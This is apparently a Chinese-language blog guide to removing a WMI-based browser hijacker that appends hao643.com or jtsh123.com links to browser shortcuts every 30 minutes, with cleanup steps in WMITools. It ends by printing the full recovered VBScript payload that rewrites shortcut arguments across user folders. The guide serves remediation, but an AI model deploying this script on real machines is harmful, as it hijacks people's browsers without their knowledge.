WMITools修复wmi劫持--hao643.com/jtsh123劫持（修改快捷方式跳转至hao123.com）

>症状：
所有浏览器快捷方式，都被加上尾巴，例如IE的："C:\Program Files\Internet Explorer\iexplore.exe" http://hao643.com/?r=ggggg&m=c104
手工去掉尾巴后，每隔一定时间（网友说是30分钟）后，尾巴重新被加上。
PS：这病毒仅修改快捷方式，应该没有其它病毒特征。

>解决方案：
1.安装WMITools（点击下载）
2.管理员身份打开 C:\Program Files (x86)\WMI Tools\wbemEventViewer.exe
3.点击左上角第一个按钮 “Register for Events”(钢笔形状)

4. 弹出WMI Event Registration Editor新窗口，在弹出的“连接命名空间”里，输入root\CIMV2

我的是默认已经输入这个了，如果没有就需要自己创建，方法是：

自己创建Namespace的方法：

“命名空间”里，就是 root\CIMV2  了。

5. 点“OK”按钮，在login 界面也直接点“OK” 按钮。 （自己创建“命名空间”的可以跳过这一步哟）

6.  在第1个下拉菜单有3个选择项：Consumers、Filters、Timers
      

在右侧选中后右击——>选择view instant properties
                

查看ScriptText项可知，这是一段VBScript调用系统服务间隔30分钟执行一次，将所有浏览器调用加上“http://hk.jtsh123.com/?r=b&m=10” 或 "http://hao643.com/?r=ggggg&m=e2"

我们要做的是，将上方属性中的Script相关的项目下的所有VBScript内容全部删除

当然，也可以直接将“WMI Event Registration Editor”窗口的第一个下拉菜单(有3个Consumers、Filters、Timers选择项的)左侧下方的所有实例全部删除（右键菜单,Delete instance）

7.去掉所有浏览器快捷方式的尾巴－－涉及所有的浏览器快捷方式：

最后还没完，还要手动将快速启动栏中，将各个浏览器快捷命令中的“http://hk.jtsh123.com/?r=b&m=10” 或 “http://hao643.com/?r=ggggg&m=e2” 去掉！

114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe
8. 完成Done.

>附 病毒脚本

 On Error Resume Next:Const link = "http://hao643.com/?r=ggggg&m=c104":Const link360 = "http://hao643.com/?r=ggggg&m=c104&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ChenShao\Desktop,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ChenShao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And  Then:file.Attributes = file.Attributes - :End If:oShellLink.Save:End If:End If:Next:End If:Next: